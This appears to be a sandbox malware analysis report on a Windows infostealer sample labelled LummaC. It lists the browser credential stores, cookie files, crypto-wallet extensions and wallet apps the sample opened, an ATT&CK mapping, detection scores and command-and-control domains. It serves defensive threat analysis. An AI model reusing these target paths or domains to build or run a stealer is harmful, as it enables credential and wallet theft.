                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: Yara match | File source: 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2777182643.0000000001263000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XM6cn2uNux.exe PID: 5448, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: XM6cn2uNux.exe PID: 5448, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, listed by tactic (the figures preceding a technique name are reproduced as they appear in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 12 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 44 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 851 Security Software Discovery; 44 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 File and Directory Discovery; 223 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
XM6cn2uNux.exe | 54% | Virustotal |
XM6cn2uNux.exe | 58% | ReversingLabs | Win32.Exploit.LummaC
XM6cn2uNux.exe | 100% | Avira | TR/Crypt.XPACK.Gen
XM6cn2uNux.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://mindhandru.buzz/s4 | 0% | Avira URL Cloud | safe
https://mindhandru.buzz/apijs | 0% | Avira URL Cloud | safe
https://mindhandru.buzz:443/apily | 0% | Avira URL Cloud | safe
https://mindhandru.buzz/apin | 0% | Avira URL Cloud | safe
https://mindhandru.buzz:443/api | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/.$ | 0% | Avira URL Cloud | safe
https://mindhandru.buzz/d | 0% | Avira URL Cloud | safe
https://mindhandru.buzz:443/apiF | 0% | Avira URL Cloud | safe
mindhandru.buzz | 0% | Avira URL Cloud | safe
https://mindhandru.buzz/api$M | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
mindhandru.buzz | 172.67.165.185 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
prisonyfork.buzz | false | | high
hummskitnj.buzz | false | | high
mindhandru.buzz | true | Avira URL Cloud: safe | unknown
https://mindhandru.buzz/api | false | | high
                                                                https://mindhandru.buzz/dXM6cn2uNux.exe, 00000000.00000003.3543796119.0000000001215000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://mindhandru.buzz:443/apiXM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://ac.ecosia.org/autocomplete?q=XM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://mindhandru.buzz/api$MXM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://crl.microXM6cn2uNux.exe, 00000000.00000003.3516396766.0000000001247000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516501138.000000000124D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000124E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3534957778.000000000124E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgXM6cn2uNux.exe, 00000000.00000003.2857715581.000000000124A000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3492521129.0000000001262000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2857473683.0000000001242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0XM6cn2uNux.exe, 00000000.00000003.2777491421.0000000005A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchXM6cn2uNux.exe, 00000000.00000003.2246076872.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2246183178.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://mindhandru.buzz:443/apiFXM6cn2uNux.exe, 00000000.00000003.3543458647.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000002.3557479186.000000000122F000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551638285.000000000122F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
